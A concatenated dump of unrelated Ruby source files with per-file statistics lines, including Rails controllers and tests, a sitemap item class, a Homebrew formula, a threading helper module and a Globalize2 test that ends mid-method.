# @optq = @event.opt_questions.create(params[:opt_question])
# @oq_id = @optq.id
# @event_id = @event.id
# @questions = @event.text_questions + @event.bool_questions + @event.opt_questions
#
# # questions nach position sortieren
# @questions = @questions.sort_by{ |q| q.position.to_i }
# i=0
# @questions.each do |q|
# q.update_attributes(:position => i)
# i+=1
# end
#
# @event.update_attribute(:questions_count, @event.questions_count+1)
#
# respond_to do |format|
# format.html { redirect_to user_event_path(@user, @event)}
# format.js
# end
# end
#
# def show
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# redirect_to user_event_path(@user, @event)
# end
#
# def update
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @question = OptQuestion.find(params[:id])
#
# respond_to do |format|
# if @event.update_attributes(params[:opt_question])
# format.json { respond_with_bip(@question) }
# else
# format.json { respond_with_bip(@question) }
# end
# end
# end
#
# def destroy
# @optq = OptQuestion.find(params[:id])
# @oq_id = @optq.position
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @optq.destroy
#
# respond_to do |format|
# format.html { redirect_to user_event_path(@user, @event)}
# format.js
# end
# end
#
# def index
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @optq = OptQuestion.find(params[:id])
# redirect_to user_event_path(@user, @event)
# end
#
end
| 26.853659 | 87 | 0.599001 |
ed44d2242d9371fb5e3b695d5cf8f80aff4bd9c1 | 49 | module Responders
VERSION = "0.4.8".freeze
end
| 12.25 | 26 | 0.714286 |
bb89bdcfb95971e8653a7ce4f9d95f2ba4da73d9 | 6,164 | module XmlSitemap
class Item
DEFAULT_PRIORITY = 0.5
# ISO8601 regex from here: http://www.pelagodesign.com/blog/2009/05/20/iso-8601-date-validation-that-doesnt-suck/
ISO8601_REGEX = /^([\+-]?\d{4}(?!\d{2}\b))((-?)((0[1-9]|1[0-2])(\3([12]\d|0[1-9]|3[01]))?|W([0-4]\d|5[0-2])(-?[1-7])?|(00[1-9]|0[1-9]\d|[12]\d{2}|3([0-5]\d|6[1-6])))([T\s]((([01]\d|2[0-3])((:?)[0-5]\d)?|24\:?00)([\.,]\d+(?!:))?)?(\17[0-5]\d([\.,]\d+)?)?([zZ]|([\+-])([01]\d|2[0-3]):?([0-5]\d)?)?)?)?$/
attr_reader :target, :updated, :priority, :changefreq, :validate_time, :alternates, :image_location, :image_caption, :image_geolocation, :image_title, :image_license,
:video_thumbnail_location, :video_title, :video_description, :video_content_location, :video_player_location,
:video_duration, :video_expiration_date, :video_rating, :video_view_count, :video_publication_date, :video_family_friendly, :video_category,
:video_restriction, :video_gallery_location, :video_price, :video_requires_subscription, :video_uploader, :video_platform, :video_live
def initialize(target, opts={})
@target = target.to_s.strip
@updated = opts[:updated] || Time.now
@priority = opts[:priority]
@changefreq = opts[:period]
@validate_time = (opts[:validate_time] != false)
@alternates = opts[:alternates]
# Refer to http://support.google.com/webmasters/bin/answer.py?hl=en&answer=178636 for requirement to support images in sitemap
@image_location = opts[:image_location]
@image_caption = opts[:image_caption]
@image_geolocation = opts[:image_geolocation]
@image_title = opts[:image_title]
@image_license = opts[:image_license]
# Refer to http://support.google.com/webmasters/bin/answer.py?hl=en&answer=80472&topic=10079&ctx=topic#2 for requirement to support videos in sitemap
@video_thumbnail_location = opts[:video_thumbnail_location]
@video_title = opts[:video_title]
@video_description = opts[:video_description]
@video_content_location = opts[:video_content_location]
@video_player_location = opts[:video_player_location]
@video_duration = opts[:video_duration]
@video_expiration_date = opts[:video_expiration_date]
@video_rating = opts[:video_rating]
@video_view_count = opts[:video_view_count]
@video_publication_date = opts[:video_publication_date]
@video_family_friendly = opts[:video_family_friendly]
# tag
@video_category = opts[:video_category]
@video_restriction = opts[:video_restriction]
@video_gallery_location = opts[:video_gallery_location]
@video_price = opts[:video_price]
@video_requires_subscription = opts[:video_requires_subscription]
@video_uploader = opts[:video_uploader]
@video_platform = opts[:video_platform]
@video_live = opts[:video_live]
if @changefreq
@changefreq = @changefreq.to_sym
unless XmlSitemap::PERIODS.include?(@changefreq)
raise ArgumentError, "Invalid :period value '#{@changefreq}'"
end
end
unless @updated.is_a?(Time) || @updated.is_a?(Date) || @updated.is_a?(String)
raise ArgumentError, 'Time, Date, or ISO8601 String required for :updated!'
end
if @validate_time && @updated.is_a?(String) && !(@updated =~ ISO8601_REGEX)
raise ArgumentError, 'String provided to :updated did not match ISO8601 standard!'
end
@updated = @updated.to_time if @updated.is_a?(Date)
##############################################################################################
##############################################################################################
unless @video_expiration_date.is_a?(Time) || @video_expiration_date.is_a?(Date) || @video_expiration_date.is_a?(String)
raise ArgumentError, "Time, Date, or ISO8601 String required for :video_expiration_date!" unless @video_expiration_date.nil?
end
if @validate_time && @video_expiration_date.is_a?(String) && !(@video_expiration_date =~ ISO8601_REGEX)
raise ArgumentError, "String provided to :video_expiration_date did not match ISO8601 standard!"
end
@video_expiration_date = @video_expiration_date.to_time if @video_expiration_date.is_a?(Date)
##############################################################################################
##############################################################################################
unless @video_publication_date.is_a?(Time) || @video_publication_date.is_a?(Date) || @video_publication_date.is_a?(String)
raise ArgumentError, "Time, Date, or ISO8601 String required for :video_publication_date!" unless @video_publication_date.nil?
end
if @validate_time && @video_publication_date.is_a?(String) && !(@video_publication_date =~ ISO8601_REGEX)
raise ArgumentError, "String provided to :video_publication_date did not match ISO8601 standard!"
end
@video_publication_date = @video_publication_date.to_time if @video_publication_date.is_a?(Date)
end
# Returns the timestamp value of lastmod for renderer
#
def lastmod_value
if @updated.is_a?(Time)
@updated.utc.iso8601
else
@updated.to_s
end
end
# Returns the timestamp value of video:expiration_date for renderer
#
def video_expiration_date_value
if @video_expiration_date.is_a?(Time)
@video_expiration_date.utc.iso8601
else
@video_expiration_date.to_s
end
end
# Returns the timestamp value of video:publication_date for renderer
#
def video_publication_date_value
if @video_publication_date.is_a?(Time)
@video_publication_date.utc.iso8601
else
@video_publication_date.to_s
end
end
end
end
| 49.312 | 305 | 0.612914 |
5d4a8eb46dc1b63f322f31a500e9e982b25e48fc | 179 | # Chef InSpec test for recipe log_hello::default
# The Chef InSpec reference, with examples and extensive documentation, can be
# found at https://docs.chef.io/inspec/resources/
| 35.8 | 78 | 0.782123 |
08b57de1bd9bad7b0ed00115a0b627239a7ddeee | 1,040 | require File.expand_path(File.dirname(__FILE__))+'/../../test_helper'
# Verifies that the Redis-backed Follow store exposes the expected public
# API (the bang aliases of the Base relation methods). Uses shoulda-context
# on top of Test::Unit; use_redis_store and assert_method_public are test
# helpers defined elsewhere in the suite.
class RedisFollowStoreTest < Test::Unit::TestCase
  context "RedisStores::Follow" do
    setup do
      use_redis_store
      @klass = Socialization::RedisStores::Follow
      @base  = Socialization::RedisStores::Base
    end

    context "method aliases" do
      should "be set properly and made public" do
        # TODO: Can't figure out how to test method aliases properly. The following doesn't work:
        # assert @klass.method(:follow!) == @base.method(:relation!)
        assert_method_public @klass, :follow!
        assert_method_public @klass, :unfollow!
        assert_method_public @klass, :follows?
        assert_method_public @klass, :followers_relation
        assert_method_public @klass, :followers
        assert_method_public @klass, :followables_relation
        assert_method_public @klass, :followables
        assert_method_public @klass, :remove_followers
        assert_method_public @klass, :remove_followables
      end
    end
  end
end
bb3baa8eab7b9980a20ff2d86c4e92376593145d | 1,168 | class Zint < Formula
desc "Barcode encoding library supporting over 50 symbologies"
homepage "http://www.zint.org.uk/"
url "https://downloads.sourceforge.net/project/zint/zint/2.9.0/zint-2.9.0.tar.gz"
sha256 "fa02fa637f1cecb242bcc751f02710cda4026d41f8f60e0c60a8884525e56fea"
license "GPL-3.0"
head "https://git.code.sf.net/p/zint/code.git"
bottle do
cellar :any
sha256 "18c124be12f21675b75c0fffca89bc9b219ab275f95fcd50bf96ccd7ca55195e" => :catalina
sha256 "4860681d8e49db5793ffff5f54a5fd3c08b4a64ecea55683e9ed8d29f52e1a2f" => :mojave
sha256 "ff0ffd2099c20c6574ddab3bd2a89eff262eda7b884a9c4983177d05fc7769df" => :high_sierra
sha256 "f315bee8a283baa4b265d51ed5bac4b9807bf1978750777503f503ef67b70974" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "libpng"
def install
# Sandbox fix: install FindZint.cmake in zint's prefix, not cmake's.
inreplace "CMakeLists.txt", "${CMAKE_ROOT}", "#{share}/cmake"
mkdir "zint-build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
end
test do
system "#{bin}/zint", "-o", "test-zing.png", "-d", "This Text"
end
end
| 34.352941 | 94 | 0.732877 |
080e7544d2d5f1cb013aecd2b1517aec023c0d58 | 7,704 | # frozen_string_literal: true
require 'test_helper'
module Shipit
class StacksControllerTest < ActionController::TestCase
setup do
@routes = Shipit::Engine.routes
@stack = shipit_stacks(:shipit)
session[:user_id] = shipit_users(:walrus).id
end
test "validates that Shipit.github is present" do
Rails.application.secrets.stubs(:github).returns(nil)
get :index
assert_select "#github_app .missing"
assert_select ".missing", count: 1
end
test "validates that Shipit.redis_url is present" do
Shipit.stubs(redis_url: nil)
get :index
assert_select "#redis_url .missing"
assert_select ".missing", count: 1
end
test "validates that Shipit.host is present" do
Shipit.stubs(host: nil)
get :index
assert_select "#host .missing"
assert_select ".missing", count: 1
end
test "GitHub authentication is mandatory" do
session[:user_id] = nil
get :index
assert_redirected_to '/github/auth/github?origin=http%3A%2F%2Ftest.host%2F'
end
test "current_user must be a member of at least a Shipit.github_teams" do
session[:user_id] = shipit_users(:bob).id
Shipit.stubs(:github_teams).returns([shipit_teams(:cyclimse_cooks), shipit_teams(:shopify_developers)])
get :index
assert_response :forbidden
assert_equal(
'You must be a member of cyclimse/cooks or shopify/developers to access this application.',
response.body,
)
end
test "#index list all stacks" do
get :index, params: { show_archived: true }
assert_response :ok
assert_select ".stack", count: Stack.count
end
test "#index list all not archived stacks" do
get :index
assert_response :ok
assert_select ".stack", count: Stack.not_archived.count
end
test "#index list a repo stacks if the :repo params is passed" do
repo = shipit_repositories(:shipit)
get :index, params: { repo: repo.full_name }
assert_response :ok
assert_select ".stack", count: repo.stacks.count
end
test "#show is success" do
get :show, params: { id: @stack.to_param }
assert_response :ok
end
test "#show with faulty and validating deploys is success" do
get :show, params: { id: shipit_stacks(:shipit_canaries).to_param }
assert_response :ok
end
test "#show with a single CheckRun is successful" do
@stack = shipit_stacks(:check_runs)
assert_not_equal 0, CheckRun.where(stack_id: @stack.id).count
get :show, params: { id: @stack.to_param }
assert_response :ok
end
test "#show handles locked stacks without a lock_author" do
@stack.update!(lock_reason: "I am a lock with no author")
get :show, params: { id: @stack.to_param }
end
test "#show auto-links URLs in lock reason" do
@stack.update!(lock_reason: 'http://google.com')
get :show, params: { id: @stack.to_param }
assert_response :ok
assert_select 'a[href="http://google.com"]'
end
test "#create creates a Stack, queues a job to setup webhooks and redirects to it" do
assert_difference "Stack.count" do
post :create, params: {
stack: {
repo_name: 'rails',
repo_owner: 'rails',
environment: 'staging',
branch: 'staging',
},
}
end
assert_redirected_to stack_path(Stack.last)
end
test "#create when not valid renders new" do
assert_no_difference "Stack.count" do
post :create, params: { stack: { repo_owner: 'some', repo_name: 'owner/path' } }
end
assert_response :success
end
test "#destroy enqueues a DestroyStackJob" do
assert_enqueued_with(job: DestroyStackJob, args: [@stack]) do
delete :destroy, params: { id: @stack.to_param }
end
assert_redirected_to stacks_path
end
test "#settings is success" do
get :settings, params: { id: @stack.to_param }
assert_response :success
end
test "#statistics is success" do
get :statistics, params: { id: @stack.to_param }
assert_response :success
end
test "#statistics redirects to #show if no deploys are present" do
@stack.deploys.destroy_all
get :statistics, params: { id: @stack.to_param }
assert_redirected_to stack_path(@stack)
end
test "#update allows to lock the stack" do
refute @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { lock_reason: 'Went out to eat some chips!' } }
@stack.reload
assert @stack.locked?
assert_equal shipit_users(:walrus), @stack.lock_author
end
test "#update allows to unlock the stack" do
@stack.update!(lock_reason: 'Went out to eat some chips!')
assert @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { lock_reason: '' } }
@stack.reload
refute @stack.locked?
assert_instance_of AnonymousUser, @stack.lock_author
end
test "#update allows to archive the stack" do
refute @stack.archived?
refute @stack.locked?
patch :update, params: { id: @stack.to_param, stack: { archived: "true" } }
@stack.reload
assert @stack.archived?
assert @stack.locked?
assert_equal shipit_users(:walrus), @stack.lock_author
assert_equal "Archived", @stack.lock_reason
end
test "#update allows to dearchive the stack" do
@stack.archive!(shipit_users(:walrus))
assert @stack.locked?
assert @stack.archived?
patch :update, params: { id: @stack.to_param, stack: { archived: "false" } }
@stack.reload
refute @stack.archived?
refute @stack.locked?
assert_nil @stack.locked_since
assert_nil @stack.lock_reason
assert_instance_of AnonymousUser, @stack.lock_author
end
test "#refresh queues a RefreshStatusesJob and a GithubSyncJob" do
request.env['HTTP_REFERER'] = stack_settings_path(@stack)
assert_enqueued_with(job: RefreshStatusesJob, args: [stack_id: @stack.id]) do
assert_enqueued_with(job: RefreshCheckRunsJob, args: [stack_id: @stack.id]) do
assert_enqueued_with(job: GithubSyncJob, args: [stack_id: @stack.id]) do
post :refresh, params: { id: @stack.to_param }
end
end
end
assert_redirected_to stack_settings_path(@stack)
end
test "#clear_git_cache queues a ClearGitCacheJob" do
assert_enqueued_with(job: ClearGitCacheJob, args: [@stack]) do
post :clear_git_cache, params: { id: @stack.to_param }
end
assert_redirected_to stack_settings_path(@stack)
end
test "#clear_git_cache displays a flash message" do
post :clear_git_cache, params: { id: @stack.to_param }
assert_equal 'Git Cache clearing scheduled', flash[:success]
end
test "#update redirects to return_to parameter" do
patch :update, params: { id: @stack.to_param, stack: { ignore_ci: false }, return_to: stack_path(@stack) }
assert_redirected_to stack_path(@stack)
end
test "#lookup redirects to the canonical URL" do
get :lookup, params: { id: @stack.id }
assert_redirected_to stack_path(@stack)
end
test "#create does not create stack with invalid deploy_url" do
post :create, params: {
stack: {
repo_name: 'rails',
repo_owner: 'rails',
environment: 'staging',
branch: 'staging',
deploy_url: 'Javascript:alert(1);',
},
}
assert_response :success
assert_equal 'Deploy url is invalid', flash[:warning]
end
end
end
| 32.1 | 112 | 0.65135 |
79d29871da096a1600f035eace8a590134b62e90 | 1,025 | APP_ROOT = "#{File.join(File.dirname(__FILE__),"..")}/"
require 'yaml'
require 'gamebox'
require 'releasy'
Gamebox.configure do |config|
config.config_path = APP_ROOT + "config/"
config.data_path = APP_ROOT + "data/"
config.music_path = APP_ROOT + "data/music/"
config.sound_path = APP_ROOT + "data/sounds/"
config.gfx_path = APP_ROOT + "data/graphics/"
config.fonts_path = APP_ROOT + "data/fonts/"
config.gb_config_path = GAMEBOX_PATH + "config/"
config.gb_data_path = GAMEBOX_PATH + "data/"
config.gb_music_path = GAMEBOX_PATH + "data/music/"
config.gb_sound_path = GAMEBOX_PATH + "data/sounds/"
config.gb_gfx_path = GAMEBOX_PATH + "data/graphics/"
config.gb_fonts_path = GAMEBOX_PATH + "data/fonts/"
# config.stages = [:demo]
# config.game_name = "Untitled Game"
end
[GAMEBOX_PATH, APP_ROOT, File.join(APP_ROOT,'src')].each{|path| $: << path }
require "gamebox_application"
require_all Dir.glob("{src,lib}/**/*.rb").reject{ |f| f.match("src/app.rb")}
| 31.060606 | 77 | 0.677073 |
793ce008df09082027688c1c88cdf26bbf658e4b | 2,602 | =begin
#Topological Inventory Ingress API
#Topological Inventory Ingress API
OpenAPI spec version: 0.0.2
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-SNAPSHOT
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TopologicalInventoryIngressApiClient::ServiceInstance
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'ServiceInstance' do
before do
# run before each test
@instance = TopologicalInventoryIngressApiClient::ServiceInstance.new
end
after do
# run after each test
end
describe 'test an instance of ServiceInstance' do
it 'should create an instance of ServiceInstance' do
expect(@instance).to be_instance_of(TopologicalInventoryIngressApiClient::ServiceInstance)
end
end
describe 'test attribute "source_ref"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_created_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_deleted_at"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "resource_timestamp"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "service_offering"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "service_parameters_set"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "source_region"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "subscription"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.911111 | 102 | 0.731745 |
7a75ad716d0a6af8dac396b924626b18a8536801 | 2,249 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe AwardEmojisFinder do
let_it_be(:issue_1) { create(:issue) }
let_it_be(:issue_1_thumbsup) { create(:award_emoji, name: 'thumbsup', awardable: issue_1) }
let_it_be(:issue_1_thumbsdown) { create(:award_emoji, name: 'thumbsdown', awardable: issue_1) }
# Create a matching set of emoji for a second issue.
# These should never appear in our finder results
let_it_be(:issue_2) { create(:issue) }
let_it_be(:issue_2_thumbsup) { create(:award_emoji, name: 'thumbsup', awardable: issue_2) }
let_it_be(:issue_2_thumbsdown) { create(:award_emoji, name: 'thumbsdown', awardable: issue_2) }
describe 'param validation' do
it 'raises an error if `name` is invalid' do
expect { described_class.new(issue_1, { name: 'invalid' }).execute }.to raise_error(
ArgumentError,
'Invalid name param'
)
end
it 'does not raise an error if `name` is numeric' do
subject = described_class.new(issue_1, { name: 100 })
expect { subject.execute }.not_to raise_error
end
it 'raises an error if `awarded_by` is invalid' do
expectation = [ArgumentError, 'Invalid awarded_by param']
expect { described_class.new(issue_1, { awarded_by: issue_2 }).execute }.to raise_error(*expectation)
expect { described_class.new(issue_1, { awarded_by: 'not-an-id' }).execute }.to raise_error(*expectation)
expect { described_class.new(issue_1, { awarded_by: 1.123 }).execute }.to raise_error(*expectation)
end
end
describe '#execute' do
it 'scopes to the awardable' do
expect(described_class.new(issue_1).execute).to contain_exactly(
issue_1_thumbsup, issue_1_thumbsdown
)
end
it 'filters by emoji name' do
expect(described_class.new(issue_1, { name: 'thumbsup' }).execute).to contain_exactly(issue_1_thumbsup)
expect(described_class.new(issue_1, { name: '8ball' }).execute).to be_empty
end
it 'filters by user' do
expect(described_class.new(issue_1, { awarded_by: issue_1_thumbsup.user }).execute).to contain_exactly(issue_1_thumbsup)
expect(described_class.new(issue_1, { awarded_by: issue_2_thumbsup.user }).execute).to be_empty
end
end
end
| 40.890909 | 126 | 0.70787 |
acf77d0dd5c1ec72a614808acedc9554141ea165 | 828 | module PoolArchiveTestHelper
def mock_pool_version_service!
setup do
PoolVersion.stubs(:sqs_service).returns(MockPoolSqsService.new)
PoolVersion.establish_connection(PoolVersion.database_url)
PoolVersion.connection.begin_transaction joinable: false
end
teardown do
PoolVersion.connection.rollback_transaction
end
end
class MockPoolSqsService
def send_message(msg, *options)
_, json = msg.split(/\n/)
json = JSON.parse(json)
prev = PoolVersion.where(pool_id: json["pool_id"]).order("id desc").first
if merge?(prev, json)
prev.update_columns(json)
else
PoolVersion.create!(json)
end
end
def merge?(prev, json)
prev && (prev.updater_id == json["updater_id"]) && (prev.updated_at >= 1.hour.ago)
end
end
end
| 26.709677 | 88 | 0.678744 |
1ac4af107081333894a9d4441128253fe6baefaa | 600 | class TrucksController < ApplicationController
before_action :authenticate_user, :dispatcher_or_this_truck_driver
skip_before_action :dispatcher_or_this_truck_driver, only: [:index]
def index
render json: Truck.visible_to(current_user)
end
def show
render json: Truck.find(params[:id])
end
def shift_available
render json: Truck.find(params[:id]).shift_available?(params[:date], params[:shift])
end
private
def dispatcher_or_this_truck_driver
raise 'Invalid truck id' unless current_user.truck.nil? || params[:id].to_i == current_user.truck.id
end
end
| 27.272727 | 106 | 0.755 |
1ce4c040b2416ac94c10da5f0206fe2a94d36bf5 | 564 | # == Schema Information
#
# Table name: morphology_word_verb_forms
#
# id :bigint not null, primary key
# name :string
# value :string
# created_at :datetime not null
# updated_at :datetime not null
# word_id :bigint
#
# Indexes
#
# index_morphology_word_verb_forms_on_name (name)
# index_morphology_word_verb_forms_on_word_id (word_id)
#
# Foreign Keys
#
# fk_rails_... (word_id => words.id)
#
class Morphology::WordVerbForm < ApplicationRecord
belongs_to :word, class_name: 'Morphology::Word'
end
| 23.5 | 57 | 0.675532 |
1a69a76528e6c998b3c3b4d3a94a89ad2e8e7790 | 493 | dir = Pathname(__FILE__).dirname.expand_path / 'adapters'
require dir / 'abstract_adapter'
require dir / 'in_memory_adapter'
# NOTE: this is a temporary work-around to the load error problems,
# and is better fixed in dm-core/next. The main reason the fix is
# not applied in dm-core/master is because the change is non-trivial.
%w[ data_objects sqlite3 mysql postgres ].each do |gem|
begin
require dir / "#{gem}_adapter"
rescue LoadError, Gem::Exception
# ignore it
end
end
| 29 | 69 | 0.73428 |
183ab866cdf476c3762b541a22869ee7dfee3e46 | 700 | module Cesri
class RecepcionComprobanteResponse
attr_reader :response, :state, :messages
def initialize(response)
@response = response
@state = state_value
@messages = []
load_messages
end
def success?
@state == 'RECIBIDA'
end
private
def state_value
doc.xpath('//estado').first.content if doc.xpath('//estado').first
end
def load_messages
doc.xpath('//mensajes//mensaje').each do |message|
response_message = ResponseMessage.new(message)
messages << response_message if response_message.identificador
end
end
def doc
@doc ||= Nokogiri::XML(@response.to_s)
end
end
end
| 18.918919 | 72 | 0.635714 |
b9ffb84bc8098ff820ab94f3b34cf5816a10b944 | 8,673 | #
# == Synopsis
# The Threaded module is used to perform some activity at a specified
# interval.
#
# == Details
# Sometimes it is useful for an object to have its own thread of execution
# to perform a task at a recurring interval. The Threaded module
# encapsulates this functionality so you don't have to write it yourself. It
# can be used with any object that responds to the +run+ method.
#
# The threaded object is run by calling the +start+ method. This will create
# a new thread that will invoke the +run+ method at the desired interval.
# Just before the thread is created the +before_starting+ method will be
# called (if it is defined by the threaded object). Likewise, after the
# thread is created the +after_starting+ method will be called (if it is
# defined by the threaded object).
#
# The threaded object is stopped by calling the +stop+ method. This sets an
# internal flag and then wakes up the thread. The thread gracefully exits
# after checking the flag. Like the start method, before and after methods
# are defined for stopping as well. Just before the thread is stopped the
# +before_stopping+ method will be called (if it is defined by the threaded
# object). Likewise, after the thread has died the +after_stopping+ method
# will be called (if it is defined by the threaded object).
#
# Calling the +join+ method on a threaded object will cause the calling
# thread to wait until the threaded object has stopped. An optional timeout
# parameter can be given.
#
module DirectoryWatcher::Threaded
# This method will be called by the activity thread at the desired
# interval. Implementing classes are expect to provide this
# functionality.
#
def run
raise NotImplementedError,
'The run method must be defined by the threaded object.'
end
# Start the activity thread. If already started this method will return
# without taking any action.
#
# If the including class defines a 'before_starting' method, it will be
# called before the thread is created and run. Likewise, if the
# including class defines an 'after_starting' method, it will be called
# after the thread is created.
#
def start
return self if _activity_thread.running?
before_starting if self.respond_to?(:before_starting)
@_activity_thread.start self
after_starting if self.respond_to?(:after_starting)
self
end
# Stop the activity thread. If already stopped this method will return
# without taking any action.
#
# If the including class defines a 'before_stopping' method, it will be
# called before the thread is stopped. Likewise, if the including class
# defines an 'after_stopping' method, it will be called after the thread
# has stopped.
#
def stop
return self unless _activity_thread.running?
before_stopping if self.respond_to?(:before_stopping)
@_activity_thread.stop
self
end
# Stop the activity thread from doing work. This will not stop the activity
# thread, it will just stop it from calling the 'run' method on every
# iteration. It will also not increment the number of iterations it has run.
def pause
@_activity_thread.working = false
end
# Resume the activity thread
def resume
@_activity_thread.working = true
end
# Wait on the activity thread. If the thread is already stopped, this
# method will return without taking any action. Otherwise, this method
# does not return until the activity thread has stopped, or a specific
# number of iterations has passed since this method was called.
#
def wait( limit = nil )
return self unless _activity_thread.running?
initial_iterations = @_activity_thread.iterations
loop {
break unless @_activity_thread.running?
break if limit and @_activity_thread.iterations > ( initial_iterations + limit )
Thread.pass
}
end
# If the activity thread is running, the calling thread will suspend
# execution and run the activity thread. This method does not return until
# the activity thread is stopped or until _limit_ seconds have passed.
#
# If the activity thread is not running, this method returns immediately
# with +nil+.
#
def join( limit = nil )
_activity_thread.join(limit) ? self : nil
end
# Returns +true+ if the activity thread is running. Returns +false+
# otherwise.
#
def running?
_activity_thread.running?
end
# Returns +true+ if the activity thread has finished its maximum
# number of iterations or the thread is no longer running.
# Returns +false+ otherwise.
#
def finished_iterations?
return true unless _activity_thread.running?
@_activity_thread.finished_iterations?
end
# Returns the status of threaded object.
#
# 'sleep' : sleeping or waiting on I/O
# 'run' : executing
# 'aborting' : aborting
# false : not running or terminated normally
# nil : terminated with an exception
#
# If this method returns +nil+, then calling join on the threaded object
# will cause the exception to be raised in the calling thread.
#
def status
return false if _activity_thread.thread.nil?
@_activity_thread.thread.status
end
# Sets the number of seconds to sleep between invocations of the
# threaded object's 'run' method.
#
def interval=( value )
value = Float(value)
raise ArgumentError, "Sleep interval must be >= 0" unless value >= 0
_activity_thread.interval = value
end
# Returns the number of seconds to sleep between invocations of the
# threaded object's 'run' method.
#
def interval
_activity_thread.interval
end
# Sets the maximum number of invocations of the threaded object's
# 'run' method
#
def maximum_iterations=( value )
unless value.nil?
value = Integer(value)
raise ArgumentError, "maximum iterations must be >= 1" unless value >= 1
end
_activity_thread.maximum_iterations = value
end
# Returns the maximum number of invocations of the threaded
# object's 'run' method
#
def maximum_iterations
_activity_thread.maximum_iterations
end
# Returns the number of iterations of the threaded object's 'run' method
# completed thus far.
#
def iterations
_activity_thread.iterations
end
# Set to +true+ to continue running the threaded object even if an error
# is raised by the +run+ method. The default behavior is to stop the
# activity thread when an error is raised by the run method.
#
# A SystemExit will never be caught; it will always cause the Ruby
# interpreter to exit.
#
def continue_on_error=( value )
_activity_thread.continue_on_error = (value ? true : false)
end
# Returns +true+ if the threaded object should continue running even if an
# error is raised by the run method. The default is to return +false+. The
# threaded object will stop running when an error is raised.
#
def continue_on_error?
_activity_thread.continue_on_error
end
# :stopdoc:
def _activity_thread
@_activity_thread ||= ::DirectoryWatcher::Threaded::ThreadContainer.new(60, 0, nil, false);
end # @private
# @private
ThreadContainer = Struct.new( :interval, :iterations, :maximum_iterations, :continue_on_error, :thread, :running, :working) {
def start( threaded )
self.working = true
self.running = true
self.iterations = 0
self.thread = Thread.new { run threaded }
Thread.pass
end # @private
def stop
self.running = false
thread.wakeup
end # @private
def run( threaded )
loop do
begin
break unless running?
do_work( threaded )
sleep interval if running?
rescue SystemExit; raise
rescue Exception => err
if continue_on_error
$stderr.puts err
else
$stderr.puts err
raise err
end
end
end
ensure
if threaded.respond_to?(:after_stopping) and !self.running
threaded.after_stopping
end
self.running = false
end # @private
def join( limit = nil )
return if thread.nil?
limit ? thread.join(limit) : thread.join
end # @private
def do_work( threaded )
if working then
threaded.run
if maximum_iterations
self.iterations += 1
if finished_iterations?
self.running = false
end
end
end
end # @private
def finished_iterations?
return true if maximum_iterations and (iterations >= maximum_iterations)
return false
end # @private
alias :running? :running
}
# :startdoc:
end
| 31.197842 | 127 | 0.70068 |
613f518077d071c2452522384fd8340ee1ba801d | 363 | require "bundler/setup"
require "testqit"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 24.2 | 66 | 0.752066 |
e892156a4d1619d8845d786c23bfc6638bf0faa2 | 6,492 | require File.join( File.dirname(__FILE__), '..', 'test_helper' )
require 'active_record'
begin
require 'globalize/model/active_record'
rescue MissingSourceFile
puts "This plugin requires the Globalize2 plugin: http://github.com/joshmh/globalize2/tree/master"
puts
raise
end
require 'globalize2_versioning'
# Hook up model translation
ActiveRecord::Base.send :include, Globalize::Model::ActiveRecord::Translated
ActiveRecord::Base.send :include, Globalize::Model::ActiveRecord::Versioned
# Load Section model
require File.join( File.dirname(__FILE__), '..', 'data', 'post' )
class VersionedTest < ActiveSupport::TestCase
def setup
I18n.locale = :'en-US'
I18n.fallbacks.clear
reset_db! File.expand_path(File.join(File.dirname(__FILE__), '..', 'data', 'schema.rb'))
end
########################################
# Test translated field only for Section
########################################
test "modifiying translated fields" do
section = Section.create :title => 'foo'
assert_equal 'foo', section.title
section.title = 'bar'
assert_equal 'bar', section.title
end
test "modifiying translated fields while switching locales" do
section = Section.create :title => 'foo'
assert_equal 'foo', section.title
I18n.locale = :'de-DE'
section.title = 'bar'
assert_equal 'bar', section.title
I18n.locale = :'en-US'
assert_equal 'foo', section.title
I18n.locale = :'de-DE'
section.title = 'bar'
end
test "has section_translations" do
section = Section.create
assert_nothing_raised { section.globalize_translations }
end
test "returns the value passed to :title" do
section = Section.new
assert_equal 'foo', (section.title = 'foo')
end
test "translates subject and content into en-US" do
section = Section.create :title => 'foo', :content => 'bar'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
assert section.save
section.reload
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "finds a German section" do
I18n.fallbacks.map 'de-DE' => [ 'en-US' ]
section = Section.create :title => 'foo (en)', :content => 'bar'
